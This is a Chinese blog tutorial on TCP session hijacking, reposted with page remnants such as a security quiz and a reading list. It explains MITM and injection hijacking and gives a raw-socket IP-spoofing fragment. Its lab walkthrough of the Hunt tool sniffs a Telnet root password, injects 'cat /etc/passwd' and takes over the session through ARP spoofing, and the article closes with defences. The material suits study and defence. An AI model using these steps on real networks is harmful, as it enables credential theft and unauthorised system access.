会话劫持攻击实战与防范

1,什么是会话劫持
在现实生活中,比如你去市场买菜,在交完钱后你要求先去干一些别的事情,稍候再来拿菜;如果这个时候某个陌生人要求把菜拿走,卖菜的人会把菜给陌生人吗?!当然,这只是一个比喻,但这恰恰就是会话劫持的喻意。所谓会话,就是两台主机之间的一次通讯。例如你Telnet到某台主机,这就是一次Telnet会话;你浏览某个网站,这就是一次HTTP会话。而会话劫持(Session Hijack),就是结合了嗅探以及欺骗技术在内的攻击手段。例如,在一次正常的会话过程当中,攻击者作为第三方参与到其中,他可以在正常数据包中插入恶意数据,也可以在双方的会话当中进行简听,甚至可以是代替某一方主机接管会话。我们可以把会话劫持攻击分为两种类型:1)中间人攻击(Man In The Middle,简称MITM),2)注射式攻击(Injection);并且还可以把会话劫持攻击分为两种形式:1)被动劫持,2)主动劫持;被动劫持实际上就是在后台监视双方会话的数据流,丛中获得敏感数据;而主动劫持则是将会话当中的某一台主机“踢”下线,然后由攻击者取代并接管会话,这种攻击方法危害非常大,攻击者可以做很多事情,比如“cat etc/master.passwd”(FreeBSD下的Shadow文件)。图1为会话劫持示意图。

MITM攻击简介
这也就是我们常说的“中间人攻击”,在网上讨论比较多的就是SMB会话劫持,这也是一个典型的中间人攻击。要想正确的实施中间人攻击,攻击者首先需要使用ARP欺骗或DNS欺骗,将会话双方的通讯流暗中改变,而这种改变对于会话双方来说是完全透明的。关于ARP欺骗黑客防线介绍的比较多,网上的资料也比较多,我就不在多说了,我只简单谈谈DNS欺骗。DNS(Domain Name System),即域名服务器,我们几乎天天都要用到。对于正常的DNS请求,例如在浏览器输入www.hacker.com.cn,然后系统先查看Hosts文件,如果有相对应的IP,就使用这个IP地址访问网站(其实,利用Hosts文件就可以实现DNS欺骗);如果没有,才去请求DNS服务器;DNS服务器在接收到请求之后,解析出其对应的IP地址,返回给我本地,最后你就可以登陆到黑客防线的网站。而DNS欺骗则是,目标将其DNS请求发送到攻击者这里,然后攻击者伪造DNS响应,将正确的IP地址替换为其他IP,之后你就登陆了这个攻击者指定的IP,而攻击者早就在这个IP中安排好了恶意网页,可你却在不知不觉中已经被攻击者下了“套”……DNS欺骗也可以在广域网中进行,比较常见的有“Web服务器重定向”、“邮件服务器重定向”等等。但不管是ARP欺骗,还是DNS欺骗,中间人攻击都改变正常的通讯流,它就相当于会话双方之间的一个透明代理,可以得到一切想知道的信息,甚至是利用一些有缺陷的加密协议来实现。

注射式攻击简介
这种方式的会话劫持比中间人攻击实现起来简单一些,它不会改变会话双方的通讯流,而是在双方正常的通讯流插入恶意数据。在注射式攻击中,需要实现两种技术:1)IP欺骗,2)预测TCP序列号。如果是UDP协议,只需伪造IP地址,然后发送过去就可以了,因为UDP没有所谓的TCP三次握手,但基于UDP的应用协议有流控机制,所以也要做一些额外的工作。对于IP欺骗,有两种情况需要用到:1)隐藏自己的IP地址;2)利用两台机器之间的信任关系实施入侵。在Unix/Linux平台上,可以直接使用Socket构造IP包,在IP头中填上虚假的IP地址,但需要root权限;在Windows平台上,不能使用Winsock,需要使用Winpacp(也可以使用Libnet)。例如在Linux系统,首先打开一个Raw Socket(原始套接字),然后自己编写IP头及其他数据。可以参考下面的实例代码:
sockfd = socket(AF_INET, SOCK_RAW, 255);
setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));

struct ip *ip;
struct tcphdr *tcp;
struct pseudohdr pseudoheader;
ip->ip_src.s_addr = xxx;
pseudoheader.saddr.s_addr = ip->ip_src.s_addr;
tcp->check = tcpchksum((u_short *)&pseudoheader,12+sizeof(struct tcphdr));
sendto(sockfd, buf, len, 0, (const sockaddr *)addr, sizeof(struct sockaddr_in));

对于基于TCP协议的注射式会话劫持,攻击者应先采用嗅探技术对目标进行简听,然后从简听到的信息中构造出正确的序列号,如果不这样,你就必须先猜测目标的ISN(初始序列号),这样无形中对会话劫持加大了难度。那为什么要猜测会话双方的序列号呢?请继续往下看。

2,TCP会话劫持
本文主要叙述基于TCP协议的会话劫持。如果劫持一些不可靠的协议,那将轻而易举,因为它们没有提供一些认证措施;而TCP协议被欲为是可靠的传输协议,所以要重点讨论它。
根据TCP/IP中的规定,使用TCP协议进行通讯需要提供两段序列号,TCP协议使用这两段序列号确保连接同步以及安全通讯,系统的TCP/IP协议栈依据时间或线性的产生这些值。在通讯过程中,双方的序列号是相互依赖的,这也就是为什么称TCP协议是可靠的传输协议(具体可参见RFC 793)。如果攻击者在这个时候进行会话劫持,结果肯定是失败,因为会话双方“不认识”攻击者,攻击者不能提供合法的序列号;所以,会话劫持的关键是预测正确的序列号,攻击者可以采取嗅探技术获得这些信息。

TCP协议的序列号
现在来讨论一下有关TCP协议的序列号的相关问题。在每一个数据包中,都有两段序列号,它们分别为:
SEQ:当前数据包中的第一个字节的序号
ACK:期望收到对方数据包中第一个字节的序号

假设双方现在需要进行一次连接:
S_SEQ:将要发送的下一个字节的序号
S_ACK:将要接收的下一个字节的序号
S_WIND:接收窗口
//以上为服务器(Server)
C_SEQ:将要发送的下一个字节的序号
C_ACK:将要接收的下一个字节的序号
C_WIND:接收窗口
//以上为客户端(Client)

它们之间必须符合下面的逻辑关系,否则该数据包会被丢弃,并且返回一个ACK包(包含期望的序列号)。
C_ACK <= C_SEQ <= C_ACK + C_WIND
S_ACK <= S_SEQ <= S_ACK + S_WIND

如果不符合上边的逻辑关系,就会引申出一个“致命弱点”,具体请接着往下看。

致命弱点
这个致命的弱点就是ACK风暴(Storm)。当会话双方接收到一个不期望的数据包后,就会用自己期望的序列号返回ACK包;而在另一端,这个数据包也不是所期望的,就会再次以自己期望的序列号返回ACK包……于是,就这样来回往返,形成了恶性循环,最终导致ACK风暴。比较好的解决办法是先进行ARP欺骗,使双方的数据包“正常”的发送到攻击者这里,然后设置包转发,最后就可以进行会话劫持了,而且不必担心会有ACK风暴出现。当然,并不是所有系统都会出现ACK风暴。比如Linux系统的TCP/IP协议栈就与RFC中的描述略有不同。注意,ACK风暴仅存在于注射式会话劫持。

TCP会话劫持过程
假设现在主机A和主机B进行一次TCP会话,C为攻击者(如图2),劫持过程如下:
A向B发送一个数据包
SEQ (hex): X ACK (hex): Y
FLAGS: -AP--- Window: ZZZZ,包大小为:60

B回应A一个数据包
SEQ (hex): Y ACK (hex): X+60
FLAGS: -AP--- Window: ZZZZ,包大小为:50

A向B回应一个数据包
SEQ (hex): X+60 ACK (hex): Y+50
FLAGS: -AP--- Window: ZZZZ,包大小为:40

B向A回应一个数据包
SEQ (hex): Y+50 ACK (hex): X+100
FLAGS: -AP--- Window: ZZZZ,包大小为:30

攻击者C冒充主机A给主机B发送一个数据包
SEQ (hex): X+100 ACK (hex): Y+80
FLAGS: -AP--- Window: ZZZZ,包大小为:20

B向A回应一个数据包
SEQ (hex): Y+80 ACK (hex): X+120
FLAGS: -AP--- Window: ZZZZ,包大小为:10

现在,主机B执行了攻击者C冒充主机A发送过来的命令,并且返回给主机A一个数据包;但是,主机A并不能识别主机B发送过来的数据包,所以主机A会以期望的序列号返回给主机B一个数据包,随即形成ACK风暴。如果成功的解决了ACK风暴(例如前边提到的ARP欺骗),就可以成功进行会话劫持了。

1,唠叨几句
可以进行会话劫持的工具很多,比较常用有Juggernaut,它可以进行TCP会话劫持的网络Sniffer程序;TTY Watcher,而它是针对单一主机上的连接进行会话劫持。还有如Dsniff这样的工具包也可以实现会话劫持,只是看你会不会使用了。但,能将会话劫持发挥得淋漓尽致的,还要算Hunt这个工具了。它的作者是Pavel Krauz,可以工作在Linux和一些Unix平台下。它的功能非常强大,首先,无论是在共享式网络还是交换式网络,它都可以正常工作;其次,可以进行中间人攻击和注射式攻击。还可以进行嗅探、查看会话、监视会话、重置会话。通过前面的叙述,我们知道在注射式攻击中,容易出现ACK风暴,解决办法是先进行ARP欺骗;而使用Hunt进行注射式攻击时,它并不进行ARP欺骗,而是在会话劫持之后,向会话双方发送带RST标志位的TCP包以中断会话,避免ACK风暴继续下去。而中间人攻击是先进行ARP欺骗,然后进行会话劫持。Hunt目前最新版本是1.5,可以到Pavel Krauz网站下载源代码包和二进制文件http://lin.fsid.cvut.cz/~kra/#hunt

现在来看看如果使用Hunt,首先是下载并编译源代码:
[root@dahubaobao hunt]#wgethttp://www.ringz.org/hunt-1.5.tgz
[root@dahubaobao hunt]#tar zxvf hunt-1.5.tgz
[root@dahubaobao hunt]#cd hunt-1.5
[root@dahubaobao hunt-1.5]#make
[root@dahubaobao hunt-1.5]#./hunt
//Hunt是完全交互试的操作,具体如图3所示
解释一下各个选项的含义
l/w/r) list/watch/reset connections
//l(字母l)为查看当前网络上的会话;w为监视当前网络上的某个会话;r为重置当前网络上的某个会话。
a) arp/simple hijack (avoids ack storm if arp used)
//中间人攻击(会话劫持),Hunt先进行ARP欺骗,然后进行会话劫持。使用此方法可以避免出现ACK风暴。
s) simple hijack
//简单的会话劫持,也就是注射式攻击。会出现ACK风暴。
d) daemons rst/arp/sniff/mac
//该选项共实现四个功能,分别为:终止会话,自动发送带RST标志位的TCP包;ARP欺骗后进行数据包转发;不用说了,嗅探功能;在当前网络上收集MAC地址。
其他的选项很简单,不在多说了。还是来看看具体的例子吧,我想大家都等不及了!^_^

2,应用实例
测试环境:
攻击者:Red Hat Linux 9.0 IP:192.168.0.10
主机A:Windows Advanced Server IP:192.168.0.1
主机B:FreeBSD 4.9 STABLE IP:192.168.0.20

[root@dahubaobao hunt-1.5]#./hunt
/*
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*> l //查看当前网络上的会话
0)192.168.0.1 [3465] ?192.168.0.20 [23]
//主机A正在Telnet到主机B

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*> w //监视当前网络上的会话
0)192.168.0.1 [3465] ?192.168.0.20 [23]
Choose conn>0 //选择打算监视的会话。由于我的条件有限,不能模拟多个会话,请多见量。
Dump [s]rc/[d]st/oth > //回车
Print sec/dst same charactes y/n [n]> //回车

现在就可以监视会话了。主机A输入的一切内容,我们都可以看到,如图4。主机A在Telnet并登陆之后,直接su root,password:后边的就是root的密码。现在这个系统已经完全由你所控制了,自由发挥吧!

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*> s //进行注射式会话劫持
0)192.168.0.1 [3465] ?192.168.0.20 [23]
choose conn> 0
dump connection y/n [n]>
Enter the command string you wish executed or [cr]> cat /etc/passwd
攻击者的意图是获取主机B的passwd文件的内容,但由于注射式会话劫持缺陷,导致了ACK风暴,所以Hunt向会话双方发送了一个带RST标志位的TCP包来阻止ACK风暴。具体如图5所示。

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*> a //进行中间人会话劫持
0)192.168.0.1 [3862] ?192.168.0.20 [23]
choose conn> 0
arp spoof src in dst y/n [y]>
src MAC [XX:XX:XX:XX:XX:XX]>
arp spoof dst in src y/n [y]>
dst MAC [XX:XX:XX:XX:XX:XX]>
input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>
dump connectin y/n [y]> n
press key to take voer of connection
ARP spoof of 192.168.0.20 with fake mac XX:XX:XX:XX:XX:XX in host 192.168.0.1 FA
ILED
do you want to force arp spoof nutil successed y/n [y]>
CTRL-C to break
CTRL+C //手工输入CTRL+C中断,不需等待
-- operation canceled - press any key>
ARP spoof failed
ARP spoof of 192.168.0.20 in host 192.168.0.1 FAILED
you took over the connection
CTRL-] to break
-bash-2.05b$id
....................

现在,攻击者已经成功的劫持了主机A和B之间的Telnet会话。主机A输入的一切命令攻击者都可以看到,并且攻击者也可以自行插入命令,比如图6所示的例子。正如前边所说的,这种会话劫持方式先进行ARP欺骗,然后才劫持,所以,ACK风暴是不会出现的;而且,这种方式要比注射式会话劫持危害更大,从上文中我想就能看出来,我就不必在多说什么了。还有一些如Sniffer等功能,都很简单,由于已不在本文范畴,故不在多说。


防范会话劫持是一个比较大的工程。首先应该使用交换式网络替代共享式网络,虽然像Hunt这样的工具可以在交换环境中实现会话劫持,但还是应该使用交换式网络替代共享式网络,因为这样可以防范最基本的嗅探攻击。然而,最根本的解决办法是采用加密通讯,使用SSH代替Telnet、使用SSL代替HTTP,或者干脆使用IPSec/VPN,这样会话劫持就无用武之地了。其次,监视网络流量,如发现网络中出现大量的ACK包,则有可能已被进行了会话劫持攻击。

还有一点是比较重要的,就是防范ARP欺骗。实现中间人攻击的前提是ARP欺骗,如能阻止攻击者进行ARP欺骗,中间人攻击还怎样进行?!如何防范ARP欺骗,黑客防线有过详细的介绍,可以参考2003年第9期杂志。

总结
对于渗透内部网络,会话劫持确实是一种比较有效的方法,我们应该掌握。本文的实践性很强,请大家务必动手试试,并希望能掌握此技术。Hunt这个强悍的工具使用方法很简单,但却可以把会话劫持发挥淋漓尽致,真佩服作者的编程功底。

 

转载于:https://www.cnblogs.com/justwannaloveyou/archive/2010/11/24/1886909.html

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
本课程授课内容 概述 VM介绍 信息收集 网络扫描 SQL注入 跨站攻击 网络安全概述全文共49页,当前为第1页。 信息安全受到的威胁 网络安全概述全文共49页,当前为第2页。 攻击复杂度与所需入侵知识关系图 1980 1985 1990 1995 2000 密码猜测 可自动复制的代码 密码破解 利用已知的漏洞 破坏审计系统 后门 会话劫持 擦除痕迹 嗅探 包欺骗 GUI远程控制 自动探测扫描 拒绝服务 CGI攻击 工具 攻击者 入侵者水平 攻击手法 半开放隐蔽扫描 控制台入侵 DDOS 攻击 2002 高 2006 注入攻击 检测网络管理 2009 病毒蠕虫 网络安全概述全文共49页,当前为第3页。 2010 OWASP十大安全威胁 开放式WEB应用程序安全项目(OWASP,Open Web Application Security Project)是一个组织,它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。 网络安全概述全文共49页,当前为第4页。 项目一 走进网络客服 任务一:认识网络客服的含义与类型 任务二:关注网络客服的素质要求 任务三:认知网络客服岗位 1. 掌握客户和客户服务的概念,能区别客服的分类。 2. 领会客服的含义和服务意识。 3. 领会客服的职业技能标准,可模仿客服的基本礼仪。 项目任务 目的及要求 网络安全概述全文共49页,当前为第5页。 任务一 认识网络客服的含义与类型 一、理解网络客服的含义 ㈠ 客户 客户的定义 客户(customer)是指传统意义上的消费者,即购买商品的人;而在电子商务时代,客 户是指所有与企业或商家有互动行为的单位或个人。 客户主要有消费者客户、中间客户和公利客户三种。 (1)消费者客户。他们是企业产品或服务的直接消费者,也称为"最终客户"或"终端客 户"。 (2)中间客户。中间客户虽然购买企业的产品或服务,但他们并不是产品或服务的直接消 费者,而是处于企业与消费者之间的经营者。中间客户的典型代表是经销商。 (3)公利客户。公利客户代表公众利益,向企业提供资源,然后直接或间接地从企业获利 中收取一定比例的费用。公利客户的典型代表是政府、行业协会、媒体。 网络安全概述全文共49页,当前为第6页。 任务一 认识网络客服的含义与类型 2.客户的分类 (1)按客户的性质划分,主要有个体型客户和组织型客户。 个体型客户,就是出于个人或家庭的需要而购买商品或服务的对象。这类客户就是通常 所讲的最终消费者,它主要由个人和家庭购买者构成。 组织型客户,就是有一定的正式组织结构,以组织的名义,因组织运作需要而购买商品 或服务的对象。这类客户包括工商企业用户、各类中间商、机构团体、政府等。 (2)按客户重要性划分,可以把客户分成贵宾型客户、重要型客户和普通型客户三种,分 别用A、B、C表示。其客户数量比例和创造利润比例可参考表1.1。 表 1.1 用 ABC 分类法对客户进行划分 网络安全概述全文共49页,当前为第7页。 任务一 认识网络客服的含义与类型 (3)按照客户对企业和商家的忠诚程度来划分,可把客户分成潜在客户、新客户、常客户、 老客户和忠诚客户等。这种分类的客户创造的利润分布可参考图1.1。 图 1.1 不同客户创造的利润分布 网络安全概述全文共49页,当前为第8页。 任务一 认识网络客服的含义与类型 ㈡ 客服 客服的概念 客服,简单而言就是从事客户服务工作的人,主要接受客户的咨询,帮助客户解决疑 惑。客服也是一个工作岗位,泛指承担客户服务工作的机构、人员或软件。 客服的分类 按自动化程度划分,客服可分为人工客服和电子客服。 按交流媒体划分,客服又可分为文字客服、视频客服和语音客服三类。 按商业流程划分,客服在商业实践中一般分为三类,即售前客服、售中客服和售后客服。 微信客服依托于微信提供的技术条件,综合了文字客服、视频客服和语音客服的全部功能。 网络安全概述全文共49页,当前为第9页。 任务一 认识网络客服的含义与类型 二、网络客服部门的组织结构 人们根据业务发展需要为网络客服部门设置了不同的组织架构,不同的组织架构又会 影响客服人员工作职责的分配。因此,在了解客服岗位要求之前,需先了解网络客服部门 的组织架构。 使用单一平台的电子商务企业,如天猫店铺或者淘宝集市店铺等,大部分采用售前、 售中、售后的分类架构,具体架构如图1.2所示。这种架构能使售前、售中、售后客服的 专业化程度提高,问题责任归属明确;其缺点是沟通不够通畅,如售中客服不能在客户咨 询售后问题时给予准确回答。 图 1.2 单一平台企业客服部门基本组织结构 网络安全概述全文共49页,当前为第10页。 任务一 认识网络客服的含义与类型 使用多个平台的电子商
选择(考20题) 1、下面不属于木马特征的就是( D ) A、自动更换文件名,难于被发现 B、程序执行时不占太多系统资源 C、不需要服务端用户的允许就能获得系统的使用权 D、造成缓冲区的溢出,破坏程序的堆栈 2、负责产生、分配并管理PKI结构下所有用户的证书的机构就是(D ) A、LDAP目录服务器 B、业务受理点 C、注册机构RA D、认证中心CA 3、基于SET 协议的电子商务系统中对商家与持卡人进行认证的就是( B ) A、 收单银行 B、 支付网关 C、 认证中心 D、 发卡银行 4、下列(B)加密技术在加解密数据时采用的就是双钥。 A、对称密钥加密 B、 公开密钥加密 C、Hash加密 D、文本加密 5、防火墙就是常用的一种网络安全装置,下列关于它的用途的说法(B)就是对的。 A、防止内部攻击 B、防止外部攻击 C、防止内部对外部的非法访问 D、既防外部攻击,又防内部对外部非法访问 6、计算机病毒从本质上说就是(B)。 A、蛋白质 B、程序代码 C、应用程序 D、硬件 7、下列不属于IDS功能的就是(D)。 A、分析系统活动 B、识别已知攻击 C、OS日志管理 D、代理 8、密码学的目的就是(C)。 A、 研究数据加密 B、 研究数据解密 C、 研究数据保密 D、 研究信息安全 9、网络安全最终就是一个折衷的方案,即安全强度与安全操作代价的折衷,除增加安全设 施投资外,还应考虑(D)。 A、 用户的方便性 B、 管理的复杂性 C、 对现有系统的影响及对不同平台的支持 D、 上面3项都就是 10、A 方有一对密钥K A(公开) 与key A(秘密) ,B 方有一对密钥K B(公开) 与key B(秘密),现A要向B发送一条消息M,并对消息进行签名与加密,则以下方案正确的就是( C )。 A、 E ( E ( M , K A) , key B) B、 E ( E ( M , key A) , key B) C、 E ( E ( M , key A) , K B) D、 E ( E ( M , K A) , K B) 11、"公开密钥密码体制"的含义就是(C)。 A、 将所有密钥公开 B、 将私有密钥公开,公开密钥保密 C、 将公开密钥公开,私有密钥保密 D、 两个密钥相同 12、信息安全的基本属性就是(D)。 A、 机密性 B、 可用性 C、 完整性 D、 上面3项都就是 13、对攻击可能性的分析在很大程度上带有(B)。 A、 客观性 B、 主观性 C、 盲目性 D、 上面3项都不就是 14、从安全属性对各种网络攻击进行分类,截获攻击就是针对(A)的攻击。 A、 机密性 B、 可用性 C、 完整性 D、 真实性 15、从攻击方式区分攻击类型,可分为被动攻击与主动攻击。被动攻击难以(C),然而(C) 这些攻击就是可行的;主动攻击难以(C),然而(C)这些攻击就是可行的。 A、 阻止,检测,阻止,检测 B、 检测,阻止,检测,阻止 C、 检测,阻止,阻止,检测 D、 上面3项都不就是 16、窃听就是一种(A)攻击,攻击者(A)将自己的系统插入到发送站与接收站之间。截获就 是一种(A)攻击,攻击者(A)将自己的系统插入到发送站与接受站之间。 A、 被动,无须,主动,必须 B、 主动,必须,被动,无须 C、 主动,无须,被动,必须 D、 被动,必须,主动,无须 17、拒绝服务攻击的后果就是(D)。 A、 信息不可用 B、 应用程序不可用 C、 系统宕机 D、 无法向正常用户提供服务 18、机密性服务提供信息的保密,机密性服务包括(D)。 A、 文件机密性 B、 信息传输机密性 C、 通信流的机密性 D、 以上3项都就是 19、攻击者用传输数据来冲击网络接口,使服务器过于繁忙以至于不能应答请求的攻击方 式就是(A)。 A、拒绝服务攻击 B、地址欺骗攻击 C、会话劫持 D、信号包探测程序攻击 20、攻击者截获并记录了从A到B的数据,然后又从早些时候所截获的数据中提取出信息 重新发往B称为(D)。 A、中间人攻击 B、口令猜测器与字典攻击 C、强力攻击 D、重放攻击 21、网络安全就是在分布网络环境中对(D)提供安全保护。 A、 信息载体 B、 信息的处理、传输 C、 信息的存储、访问 D、 上面3项都就是 22、ISO安全体系结构中的对象认证服务,使用(B)完成。 A、 加密机制 B、 数字签名机制 C、 访问控制机制 D、 数据完整性机制 23、数据保密性安全服务的基础就是(D)。 A、 数据完整性机制 B、 数字签名机制 C、 访问控制机制 D、 加密机制 24、可以被数据完整性机制防止的攻击方式就是(D)。 A、 假冒源地址或用户的地址欺骗攻击 B、 抵赖做过信息的递交行为 C、 数据中途被攻击者窃听获取 D、 数据在途中被攻
超全的Web渗透学习资料合集,共64篇。 web渗透: web安全原则 web渗透: web渗透测试清单 web渗透: 自动化漏洞扫描 web渗透: Google Hacking web渗透: web服务器指纹识别 web渗透: 枚举web服务器应用 web渗透: 识别web应用框架 web渗透: 配置管理测试 web渗透: 身份管理测试 web渗透: 不安全的HTTP方法 web渗透: 登录认证安全测试 web渗透: 浏览器缓存攻击测试 web渗透: 目录遍历文件包含测试 web渗透: 目录浏览漏洞测试 web渗透: 越权漏洞 web渗透: 任意文件下载 web渗透: 跨站请求伪造(CSRF) web渗透: 服务端请求伪造攻击(SSRF) web渗透: 跨站脚本攻击(XSS) web渗透: HTTP Host头攻击 web渗透: SQL注入(上) web渗透: SQL注入(下) web渗透: XML注入攻击 web渗透: XXE外部实体注入 web渗透: 服务器端包含注入(SSI注入) web渗透: XPath注入 web渗透: 命令注入 web渗透: HTTP响应头拆分漏洞 web渗透: LDAP注入 web渗透: ORM注入 web渗透: Json劫持Json注入 web渗透: 宽字节注入 web渗透: 脆弱的通信加密算法 web渗透: Padding Oracle攻击 web渗透: 未加密信道发送敏感数据 web渗透: 业务逻辑数据验证 web渗透: 伪造请求 web渗透: 验证码功能缺陷 web渗透: 竞争并发漏洞 web渗透: IMAPSMTP注入 web渗透: 本地文件包含远程文件包含 web渗透: 文件上传漏洞 web渗透: web服务器控制台地址泄漏 web渗透: 报错信息测试 web渗透: 不安全的对象引用 web渗透: 基于DOM的XSS跨站 web渗透: 堆栈轨迹测试 web渗透: 常见的数据信息泄露 web渗透: web消息漏洞 web渗透: WebSockets安全测试 web渗透: 异常信息泄漏 web渗透: 防御应用程序滥用 web渗透: 客户端资源处理漏洞 web渗透: HTML注入 web渗透: Flash跨域访问漏洞 web渗透: 客户端URL重定向 web渗透: DNS域传送漏洞 web渗透: 服务器多余端口开放 web渗透: 本地存储安全 web渗透: web服务器解析漏洞 web渗透: JavaScript注入漏洞 web渗透: CSS注入 web渗透: 会话固化漏洞 web渗透: 常见的WAF绕过方法

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值